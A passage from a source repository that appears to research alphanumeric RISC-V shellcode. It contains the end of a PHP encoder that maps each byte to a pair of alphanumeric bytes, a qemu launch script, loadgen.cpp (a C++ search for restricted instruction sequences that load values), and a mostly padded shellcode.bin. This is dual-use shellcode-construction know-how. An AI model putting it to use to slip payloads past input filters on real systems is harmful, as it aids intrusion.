34 | 		 * XY == KA ^ BK, ('XY'€[0;255], 'KA' and 'LB' alnum]
35 | 		 */
36 | 		$q = ord($p[$i]);
37 | 		$wanted_bottom  = $q & 0xF;
38 | 		$wanted_top = ($q >> 4) & 0xF;
39 | 
40 | 		$low_top = 0x4;
41 | 		if($wanted_bottom == 0x4) {
42 | 			$low_top = 0x6;
43 | 		}
44 | 		$low_bottom = $wanted_bottom ^ $low_top;
45 | 
46 | 		$high_bottom = $wanted_top ^ $low_top;
47 | 		$high_top = ($high_bottom == 0) ? 0x5 : 0x4;
48 | 
49 | 		$low  = ($low_top << 4) + $low_bottom;
50 | 		$high = ($high_top << 4) + $high_bottom;
51 | 
52 | 		$s[$b+2*$i  ] = chr($low);
53 | 		$s[$b+2*$i+1] = chr($high);
54 | 
55 | 		//printf("INS: %X -> %X %X\n", $q, $low, $high);
56 | 	}
57 | 	file_put_contents($args['o'], $s);
58 | ?>
59 | 


--------------------------------------------------------------------------------
/baremetal/hash/l:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | CMD="qemu-system-riscv64 -nographic -machine sifive_u -device loader,file=shellcode.bin,addr=0x80000000"
3 | #CMD="qemu-system-riscv64 -gdb tcp::1235 -machine sifive_u -device loader,file=shellcode.bin,addr=0x80000000 -S"
4 | echo "$CMD"
5 | ${CMD}
6 | 


--------------------------------------------------------------------------------
/baremetal/hash/loadgen.cpp:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * (c) 2018-2019 Hadrien Barral
  3 |  * SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | #include <array>
  7 | #include <chrono>
  8 | #include <cstdbool>
  9 | #include <cstdio>
 10 | #include <cstring>
 11 | #include <experimental/filesystem>
 12 | #include <fstream>
 13 | #include <iostream>
 14 | #include <sstream>
 15 | #include <string>
 16 | #include <thread>
 17 | #include <unistd.h>
 18 | #include <vector>
 19 | 
 20 | /*
 21 |  * Sorry for the lack of documentation.
 22 |  * This is unfortunately a code much easier to write
 23 |  *  than to read.
 24 |  */
 25 | 
 26 | #define FENCI 0
 27 | 
 28 | using namespace std;
 29 | #define countof(x) (sizeof(x)/sizeof(x[0]))
 30 | typedef long long lli;
 31 | typedef unsigned long long llu;
 32 | 
 33 | typedef int reg_t;
 34 | typedef struct txt_y {
 35 |     const txt_y *prev1;
 36 |     const txt_y *prev2;
 37 |     const size_t tail; /* index in 'txt_parts' */
 38 | } txt_t;
 39 | 
 40 | typedef struct {
 41 |     lli shift;
 42 |     int cost;
 43 | } loadshift_t;
 44 | 
 45 | typedef struct {
 46 |     int cost;
 47 |     reg_t src; /* source reg */
 48 |     reg_t dst; /* dst reg */
 49 |     reg_t trd; /* third register (when applicable) */
 50 |     lli value; /* immediate value */
 51 |     txt_t txt; /* instruction text */
 52 | } instr_t;
 53 | 
 54 | typedef struct {
 55 |     bool valid;
 56 |     int cost;
 57 |     lli value; /* loaded full value */
 58 |     reg_t dst; /* dst reg */
 59 |     string txt;
 60 | } seq_t;
 61 | 
 62 | typedef array<seq_t, 256*256> sequences_t;
 63 | 
 64 | static reg_t parse_reg(const string &reg)
 65 | {
 66 |     int nb;
 67 |     if(reg == "gp") {
 68 |         return 3;
 69 |     }
 70 |     if(reg == "zero") {
 71 |         return 3;
 72 |     }
 73 |     switch(reg[0]) {
 74 |         case 'a':
 75 |             nb = stoi(reg.substr(1, 1));
 76 |             return 10+nb;
 77 |         case 's':
 78 |             if(reg == "sp") {
 79 |                 return 2;
 80 |             }
 81 |             nb = stoi(reg.substr(1, 1));
 82 |             if(nb < 2) {
 83 |                 return 8+nb;
 84 |             }
 85 |             return 18-2+nb;
 86 |         case 't':
 87 |             if(reg == "tp") {
 88 |                 return 4;
 89 |             }
 90 |             nb = stoi(reg.substr(1, 1));
 91 |             if(nb < 3) {
 92 |                 return 5+nb;
 93 |             }
 94 |             return 28-3+nb;
 95 |         default:
 96 |             printf("BAD reg: %s\n", reg.c_str());
 97 |             exit(1);
 98 |     }
 99 | }
100 | #define REG_COUNT 33
101 | #define NO_REG 32
102 | #define PR parse_reg
103 | 
104 | static vector<string> txt_parts; /* Contains all text string chunk associated to instructions */
105 | static vector<instr_t> lui;
106 | static array<vector<instr_t>, REG_COUNT> sra;
107 | static array<vector<instr_t>, REG_COUNT> addiw;
108 | static array<vector<instr_t>, REG_COUNT> addiw2;
109 | static array<vector<instr_t>, REG_COUNT> addiw3;
110 | static array<vector<instr_t>, REG_COUNT> addiw4;
111 | static array<vector<instr_t>, REG_COUNT> li_shift;
112 | static array<vector<instr_t>, REG_COUNT> li2_shift;
113 | static array<bool, 256*256> badupval;
114 | static array<bool, REG_COUNT> store_reg;
115 | 
116 | static stringstream read_file(const string &filename) {
117 |     ifstream in(filename.c_str());
118 |     stringstream sstr;
119 |     while(in >> sstr.rdbuf());
120 |     return sstr;
121 | }
122 | 
123 | static int val2shift(lli val)
124 | {
125 |     return (((llu)val) & 0b111111ULL);
126 | }
127 | 
128 | static void init_addiwn(const auto &addiwl, auto &addiwh)
129 | {
130 |     for(reg_t reg=0; reg < REG_COUNT; reg++) {
131 |         array<bool, 1024> addiw_val;
132 |         for (auto &used : addiw_val) {
133 |             used = false;
134 |         }
135 | 
136 |         /* Add values we can already do */
137 |         for (const auto &e : addiw[reg]) {
138 |             addiw_val[512+e.value] = true;
139 |         }
140 |         for (const auto &e : addiw2[reg]) {
141 |             addiw_val[512+e.value] = true;
142 |         }
143 |         for (const auto &e : addiw3[reg]) {
144 |             addiw_val[512+e.value] = true;
145 |         }
146 |         for (const auto &e : addiw4[reg]) {
147 |             addiw_val[512+e.value] = true;
148 |         }
149 |         addiw_val[512] = true; /* no need to have '+0' */
150 | 
151 |         for (const auto &e : addiwl[reg]) {
152 |             for (const auto &f : addiw[reg]) {
153 |                 lli sum = e.value + f.value;
154 |                 if(!addiw_val[512+sum]) {
155 |                     instr_t g = {.cost = e.cost + f.cost,
156 |                                  .src = e.src,
157 |                                  .dst = e.dst,
158 |                                  .trd = e.trd,
159 |                                  .value = sum,
160 |                                  .txt = {.prev1 = &e.txt, .prev2 = &f.txt, .tail = 0}};
161 |                     addiwh[reg].push_back(g);
162 |                     addiw_val[512+sum] = true;
163 |                 }
164 |             }
165 |         }
166 |     }
167 | }
168 | 
169 | static void init_glo(char *list_filename)
170 | {
171 |     std::stringstream in = read_file(list_filename);
172 |     std::string l;
173 |     int cost = 2;
174 |     txt_parts.clear();
175 |     txt_parts.push_back(""); /* Index 0 is empty string */
176 |     lui.clear();
177 |     for(size_t i=0; i<REG_COUNT; i++) {
178 |         sra[i].clear();
179 |         addiw[i].clear();
180 |         addiw2[i].clear();
181 |         addiw3[i].clear();
182 |         addiw4[i].clear();
183 |         li_shift[i].clear();
184 |         li2_shift[i].clear();
185 |     }
186 | 
187 |     while (std::getline(in, l)) {
188 |         if((cost == 2) && (l.substr(0, 5) == "=====")) {
189 |             cost = 4;
190 |             continue;
191 |         }
192 |         std::stringstream ll(l);
193 |         string iname;
194 |         getline(ll, iname, '\t');
195 |         if(iname == "lui") {
196 |             string dst_s;
197 |             string value_s;
198 |             getline(ll, dst_s, ',');
199 |             getline(ll, value_s, ',');
200 |             reg_t dst = parse_reg(dst_s);
201 |             lli value = stoll(value_s, 0, 16) << 12;
202 |             if(value > INT32_MAX) {
203 |                 value = (lli)(int32_t)(uint32_t) value;
204 |             }
205 | 
206 |             txt_parts.push_back(l);
207 |             instr_t new_elem = {.cost = cost, .src = NO_REG, .dst = dst, .trd = NO_REG, .value = value,
208 |                                 .txt = {.prev1 = NULL, .prev2 = NULL, .tail = txt_parts.size()-1}};
209 |             lui.push_back(new_elem);
210 |         } else if(iname == "addiw") {
211 |             string dst_s;
212 |             string src_s;
213 |             string value_s;
214 |             getline(ll, dst_s, ',');
215 |             getline(ll, src_s, ',');
216 |             getline(ll, value_s, ',');
217 |             reg_t src = parse_reg(src_s);
218 |             reg_t dst = parse_reg(dst_s);
219 |             lli value = stoll(value_s);
220 | 
221 |             if(src != dst) {
222 |                 printf("Unsupported addiw\n");
223 |                 exit(1);
224 |             }
225 | 
226 |             txt_parts.push_back(l);
227 |             instr_t new_elem = {.cost = cost, .src = src, .dst = dst, .trd = NO_REG, .value = value,
228 |                                 .txt = {.prev1 = NULL, .prev2 = NULL, .tail = txt_parts.size()-1}};
229 |             addiw[src].push_back(new_elem);
230 |         } else if(iname == "sra") {
231 |             string dst_s;
232 |             string src_s;
233 |             string trd_s;
234 |             getline(ll, dst_s, ',');
235 |             getline(ll, src_s, ',');
236 |             getline(ll, trd_s, ',');
237 |             reg_t src = parse_reg(src_s);
238 |             reg_t dst = parse_reg(dst_s);
239 |             reg_t trd = parse_reg(trd_s);
240 | 
241 |             if(src == trd) {
242 |                 continue; /* useless ! */
243 |             }
244 | 
245 |             txt_parts.push_back(l);
246 |             instr_t new_elem = {.cost = cost, .src = src, .dst = dst, .trd = trd, .value = 0,
247 |                                 .txt = {.prev1 = NULL, .prev2 = NULL, .tail = txt_parts.size()-1}};
248 |             sra[src].push_back(new_elem);
249 |         } else if(iname == "li") {
250 |             string dst_s;
251 |             string value_s;
252 |             getline(ll, dst_s, ',');
253 |             getline(ll, value_s, ',');
254 |             reg_t dst = parse_reg(dst_s);
255 |             lli value = stoll(value_s, 0, 10);
256 | 
257 |             txt_parts.push_back(l);
258 |             instr_t new_elem = {.cost = cost, .src = NO_REG, .dst = dst, .trd = NO_REG, .value = value,
259 |                                 .txt = {.prev1 = NULL, .prev2 = NULL, .tail = txt_parts.size()-1}};
260 |             li_shift[dst].push_back(new_elem);
261 |         }
262 |     }
263 | 
264 |     init_addiwn(addiw, addiw2);  /* Add useful sum of two addiw */
265 |     init_addiwn(addiw2, addiw3); /* Add useful sum of three addiw */
266 |     init_addiwn(addiw3, addiw4); /* Add useful sum of four addiw */
267 | 
268 |     /* Add useful sum of li+addiw */
269 |     for(reg_t reg=0; reg < REG_COUNT; reg++) {
270 |         array<bool, 64> li_val;
271 |         for (auto &used : li_val) {
272 |             used = false;
273 |         }
274 | 
275 |         /* Add values we can do with a single li_shift */
276 |         for (const auto &e : li_shift[reg]) {
277 |             int val = val2shift(e.value);
278 |             li_val[val] = true;
279 |         }
280 |         li_val[0] = true; /* no need to have 'li 0' */
281 | 
282 |         for (const auto &e : li_shift[reg]) {
283 |             for (const auto &f : addiw[reg]) {
284 |                 lli sum = e.value + f.value;
285 |                 int sum_shift = val2shift(sum);
286 |                 if(!li_val[sum_shift]) {
287 |                     instr_t g = {.cost = e.cost + f.cost,
288 |                                  .src = e.src,
289 |                                  .dst = e.dst,
290 |                                  .trd = e.trd,
291 |                                  .value = sum,
292 |                                  .txt = {.prev1 = &e.txt, .prev2 = &f.txt, .tail = 0}};
293 |                     li2_shift[reg].push_back(g);
294 |                     li_val[sum_shift] = true;
295 |                 }
296 |             }
297 |         }
298 |     }
299 | 
300 |     vector<reg_t> store_reg_inv{PR("gp"), PR("s3"), PR("s4"), PR("s5"),
301 |                                 PR("s6"), PR("s7"), PR("t0"), PR("t1"),
302 |                                 PR("t2"), PR("tp")                    };
303 |     std::fill(begin(store_reg), end(store_reg), 0);
304 |     for (reg_t reg : store_reg_inv) {
305 |         store_reg[reg] = 1;
306 |     }
307 | 
308 |     std::fill(begin(badupval), end(badupval), 0);
309 |     badupval[0x0000] = 1; /* "all zero bits is not legal" */
310 |     badupval[0x0C00] = 1;
311 | 
312 |     printf("init_glo done\n");
313 | }
314 | 
315 | #if FENCI
316 | static bool badup(lli value)
317 | {
318 |     uint16_t up = (value>>16) & 0xFFFFU;
319 |     return up != 0;
320 | }
321 | #else
322 | static bool badup(lli value)
323 | {
324 |     return false;
325 | 
326 |     if(((value & 0xE003U) == 0xA001U) /* j */ ||
327 |        (((value & 0xE003U) == 0x8002U) && ((value & 0x007CU) == 0x0000U) /* jalr */)) {
328 |         return false; /* This is a jump. 'up' will not get executed. */
329 |     }
330 | 
331 |     uint16_t up = (value>>16) & 0xFFFFU;
332 |     if((up%4) == 0b11U) {
333 |         return true;
334 |     }
335 |     return badupval[up];
336 | }
337 | #endif
338 | 
339 | static void build_instr_txt_sub(stringstream &store, const txt_t *txt)
340 | {
341 |     if(txt->prev1) {
342 |         build_instr_txt_sub(store, txt->prev1);
343 |     }
344 |     if(txt->prev2) {
345 |         build_instr_txt_sub(store, txt->prev2);
346 |     }
347 |     if(txt->tail != 0) {
348 |         store << txt_parts[txt->tail] << endl;
349 |     }
350 | }
351 | 
352 | static string build_instr_txt(const txt_t &txt)
353 | {
354 |     stringstream store;
355 |     build_instr_txt_sub(store, &txt);
356 |     return store.str();
357 | }
358 | 
359 | static void try_add_value(sequences_t &t, const instr_t &e)
360 | {
361 |     /* Check if the upper bits lead to an incorrect instruction */
362 |     if(badup(e.value)) {
363 |         return;
364 |     }
365 | 
366 |     /* Check if we can actually store the value */
367 |     if(!store_reg[(size_t)e.dst]) {
368 |         return;
369 |     }
370 | 
371 |     /* Check if we already have a better one for this value */
372 |     lli lo = e.value & 0xFFFFULL;
373 |     if(t[lo].valid && (t[lo].cost <= e.cost)) {
374 |         return;
375 |     }
376 | 
377 |     /* We are good to add it! */
378 |     string txt = build_instr_txt(e.txt);
379 |     seq_t seq = {.valid = 1, .cost = e.cost, .value = e.value, .dst = e.dst, .txt = txt};
380 |     t[lo] = seq;
381 | }
382 | 
383 | static void try_add_addiw_sub(sequences_t &t, const instr_t &e, const instr_t &f)
384 | {
385 |     instr_t g =  {.cost = e.cost + f.cost,
386 |                   .src = e.src,
387 |                   .dst = f.dst,
388 |                   .trd = NO_REG,
389 |                   .value = e.value + f.value,
390 |                   .txt = {.prev1 = &e.txt, .prev2 = &f.txt, .tail = 0}};
391 |     try_add_value(t, g);
392 | }
393 | 
394 | static void try_add_addiw(sequences_t &t, const instr_t &e)
395 | {
396 |     #if 1
397 |     /*
398 |      * We know that addiw does not change the destination.
399 |      * Let us do some check from 'try_add_value' here.
400 |      */
401 |     if(!store_reg[(size_t)e.dst]) {
402 |         return;
403 |     }
404 |     #endif
405 | 
406 |     for (const instr_t &f : addiw[e.dst]) {
407 |         try_add_addiw_sub(t, e, f);
408 |     }
409 |     for (const instr_t &f : addiw2[e.dst]) {
410 |         try_add_addiw_sub(t, e, f);
411 |     }
412 |     for (const instr_t &f : addiw3[e.dst]) {
413 |         try_add_addiw_sub(t, e, f);
414 |     }
415 |     for (const instr_t &f : addiw4[e.dst]) {
416 |         try_add_addiw_sub(t, e, f);
417 |     }
418 | }
419 | 
420 | static void try_add_sra_sub(sequences_t &t, const instr_t &e, const instr_t &f, const instr_t &h)
421 | {
422 |     const txt_t txt_tmp = {.prev1 = &h.txt, .prev2 = &f.txt, .tail = 0};
423 |     instr_t g = {.cost = e.cost + f.cost + h.cost,
424 |                  .src = e.src,
425 |                  .dst = f.dst,
426 |                  .trd = NO_REG,
427 |                  .value = e.value >> val2shift(h.value),
428 |                  .txt = {.prev1 = &e.txt, .prev2 = &txt_tmp, .tail = 0}};
429 |     try_add_value(t, g);
430 |     try_add_addiw(t, g);
431 | }
432 | 
433 | static void try_add_sra(sequences_t &t, const instr_t &e)
434 | {
435 |     for (const instr_t &f : sra[e.dst]) {
436 |         for(const instr_t &h : li_shift[f.trd]) {
437 |             try_add_sra_sub(t, e, f, h);
438 |         }
439 |         for(const instr_t &h : li2_shift[f.trd]) {
440 |             try_add_sra_sub(t, e, f, h);
441 |         }
442 |     }
443 | }
444 | 
445 | static void sequence_lui(sequences_t &t)
446 | {
447 |     size_t count = lui.size();
448 |     size_t steps = 100;
449 |     size_t forstep = (count + steps - 1)/steps;
450 |     size_t foridx = 0;
451 |     printf("sequence_lui:"); fflush(stdout);
452 |     for (const instr_t &e : lui) {
453 |         if((++foridx % forstep)== 0) {
454 |             printf("%d%%", (int)(((100./steps)*foridx)/forstep)); fflush(stdout);
455 |             return;
456 |         }
457 |         try_add_value(t, e);
458 |         try_add_addiw(t, e);
459 |         try_add_sra(t, e);
460 |     }
461 |     printf("\n");
462 | }
463 | 
464 | vector<sequences_t> workers_t;
465 | 
466 | static void sequence_lui_p(unsigned int core_id, size_t start_idx, size_t end_idx, lli *elapsed)
467 | {
468 |     size_t count = end_idx - start_idx;
469 |     size_t steps = 50;
470 |     size_t forstep = (count + steps - 1)/steps;
471 |     size_t foridx = 0;
472 | 
473 |     auto time_begin = std::chrono::high_resolution_clock::now();
474 |     sequences_t &t = workers_t[core_id];
475 |     #if 0
476 |     printf("slui:%zu %zu\n", start_idx, end_idx);
477 |     #endif
478 | 
479 |     for (size_t idx = start_idx; idx < end_idx; idx++) {
480 |         const instr_t &e = lui[idx];
481 |         if((++foridx % forstep)== 0) {
482 |             if(core_id == 0) {
483 |                 printf("%d%%", (int)(((100./steps)*foridx)/forstep)); fflush(stdout);
484 |             }
485 |         }
486 |         try_add_value(t, e);
487 |         try_add_addiw(t, e);
488 |         try_add_sra(t, e);
489 |     }
490 | 
491 |     printf("[%u]", core_id); fflush(stdout);
492 | 
493 |     auto time_end = std::chrono::high_resolution_clock::now();
494 |     lli _elapsed = std::chrono::duration_cast<std::chrono::nanoseconds>(time_end-time_begin).count();
495 |     *elapsed = _elapsed;
496 | }
497 | 
498 | static void best_sequences(char *split_filename, sequences_t &t)
499 | {
500 |     for (seq_t &seq : t) {
501 |         seq.valid = 0;
502 |     }
503 | 
504 |     unsigned int cores = std::thread::hardware_concurrency();
505 |     if(cores == 0) {
506 |         printf("Unable to determine how many workers to spawn. Using 1.");
507 |         cores = 1;
508 |     }
509 | 
510 |     if(cores == 1) {
511 |         /* Non-parallel version */
512 |         sequence_lui(t);
513 |         return;
514 |     }
515 | 
516 |     size_t whole_count = lui.size();
517 | 
518 |     vector<lli> workers_time;
519 |     for(unsigned int core=0; core<cores; core++) {
520 |         workers_t.push_back(t);
521 |         workers_time.push_back(0);
522 |     }
523 | 
524 |     printf("[best_sequences]\n"); fflush(stdout);
525 |     vector<std::thread> workers;
526 | 
527 |     /* Compute workload repartition */
528 |     vector<size_t> idx_table;
529 |     if(access(split_filename, F_OK) != -1) {
530 |         idx_table.push_back(0);
531 |         std::stringstream in_idx = read_file(split_filename);
532 |         size_t idx;
533 |         while(in_idx >> idx) {
534 |             idx_table.push_back(idx);
535 |         }
536 |         if((idx_table.size() != (cores+1)) ||(idx_table[cores] != whole_count)) {
537 |             printf("'%s' is corrupt (%zu/%u).\n", split_filename, idx_table.size(), cores+1);
538 |             exit(1);
539 |         }
540 |     } else {
541 |         size_t chunk = whole_count / cores;
542 |         for(unsigned int core=0; core<=cores; core++) {
543 |             size_t idx = core*chunk;
544 |             if(core == cores) {
545 |                 idx = whole_count; /* because of rounding issues */
546 |             }
547 |             idx_table.push_back(idx);
548 |         }
549 |     }
550 | 
551 |     /* Start workers */
552 |     for(unsigned int core=0; core<cores; core++) {
553 |         workers.push_back(std::thread(sequence_lui_p, core, idx_table[core], idx_table[core+1], &workers_time[core]));
554 |     }
555 | 
556 |     /* Wait for workers to end */
557 |     for (auto& worker : workers) {
558 |         worker.join();
559 |     }
560 |     printf("\n");
561 | 
562 |     /* Try to compute a better workload repartition */
563 |     std::ofstream time_out(split_filename);
564 |     for(unsigned int core=1; core<cores; core++) {
565 |         lli mult = 10000;
566 |         lli diff =    50;
567 |         if(workers_time[core-1] > workers_time[core]) {
568 |             idx_table[core] = ((mult-diff)*idx_table[core])/mult;
569 |         } else {
570 |             idx_table[core] = ((mult+diff)*idx_table[core])/mult;
571 |         }
572 |     }
573 |     for(unsigned int core=1; core<=cores; core++) {
574 |         time_out << idx_table[core] << endl;
575 |     }
576 |     time_out.close();
577 | 
578 |     /* Join values from our workers */
579 |     for(const auto& worker_t : workers_t) {
580 |         size_t size = worker_t.size();
581 |         for(size_t lo=0; lo<size; lo++) {
582 |             const seq_t &e = worker_t[lo];
583 |             if(!e.valid) {
584 |                 continue;
585 |             }
586 |             if(t[lo].valid && (t[lo].cost <= e.cost)) {
587 |                 continue;
588 |             }
589 |             t[lo] = e;
590 |         }
591 |     }
592 | }
593 | 
594 | static void print_stats(const sequences_t &t, lli elapsed)
595 | {
596 |     size_t size = t.size();
597 |     size_t count = 0;
598 |     for(size_t i=0; i<t.size(); i++) {
599 |         if(t[i].valid) {
600 |             count++;
601 |         }
602 |     }
603 |     printf("Time: %lli.%03llis\n", elapsed/1000000000, (elapsed%1000000000)/1000000);
604 |     printf("ALL: %zu/%zu (%zu%%)\n", count, size, (count*100)/size);
605 | 
606 |     #if 0
607 |     size_t found = 0;
608 |     for(size_t i=0; i<size; i++) {
609 |         if(t[i].valid) {
610 |             printf("VALID[0x%zx]{%d}: '%s'\n", i, t[i].cost, t[i].txt.c_str());
611 |             if(++found >= 1) {
612 |                 break;
613 |             }
614 |         }
615 |     }
616 |     #endif
617 | }
618 | 
619 | #if FENCI
620 | static void print_fenci(const sequences_t &t)
621 | {
622 |     for(size_t i=0xFC0; i<0x1040; i++) {
623 |         if(t[i].valid) {
624 |             printf("VALID[0x%zx]: '%s'\n", i, t[i].txt.c_str());
625 |         }
626 |     }
627 | }
628 | #endif
629 | 
630 | static void save_json(char *filename, sequences_t &t)
631 | {
632 |     ofstream json;
633 |     json.open(filename);
634 |     json << "{";
635 | 
636 |     bool first = true;
637 | 
638 |     size_t size = t.size();
639 |     for(size_t i=0; i<size; i++) {
640 |         if(t[i].valid) {
641 |             if(!first) {
642 |                 json << ",\n";
643 |             } else {
644 |                 first = 0;
645 |             }
646 |             json << "\"" << i << "\":{\"cost\":" << t[i].cost <<
647 |                     ",\"dst\":\"" << t[i].dst << "\",\"txt\":\"";
648 |             for(const char &c: t[i].txt) {
649 |                 if(isalnum(c) || (c == ' ') || (c == ',') || (c == '.') ||
650 |                    (c == '(') || (c == ')') || (c == '-')) {
651 |                     json << c;
652 |                 } else if(c == '\t') {
653 |                     json << "\\t";
654 |                 } else if(c == '\n') {
655 |                     json << "\\n";
656 |                 } else {
657 |                     printf("unknown char: '%c' (0x%x)\n", c, c);
658 |                     exit(1);
659 |                 }
660 |             }
661 |             json << "\",\"value\":" << t[i].value << "}";
662 |         }
663 |     }
664 | 
665 |     json << "}";
666 |     json.close();
667 | }
668 | 
669 | int main(int argc, char *argv[])
670 | {
671 |     printf("Loadgen starting. [Compiled at %s %s]\n", __DATE__, __TIME__);
672 | 
673 |     if(argc != 4) {
674 |         fprintf(stderr, "Usage: %s <out_file.json> <in_list.txt> <internal_state.file>", argv[0]);
675 |         exit(1);
676 |     }
677 | 
678 |     init_glo(argv[2]);
679 | 
680 |     auto time_begin = std::chrono::high_resolution_clock::now();
681 |     sequences_t t;
682 |     best_sequences(argv[3], t);
683 |     auto time_end = std::chrono::high_resolution_clock::now();
684 | 
685 |     lli elapsed = std::chrono::duration_cast<std::chrono::nanoseconds>(time_end-time_begin).count();
686 |     print_stats(t, elapsed);
687 | 
688 | #if FENCI
689 |     (void)save_json;
690 |     print_fenci(t);
691 | #else
692 |     save_json(argv[1], t);
693 | #endif
694 | 
695 |     return 0;
696 | }
697 | 


--------------------------------------------------------------------------------
/baremetal/hash/shellcode.bin:
--------------------------------------------------------------------------------
1 | o#0#BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB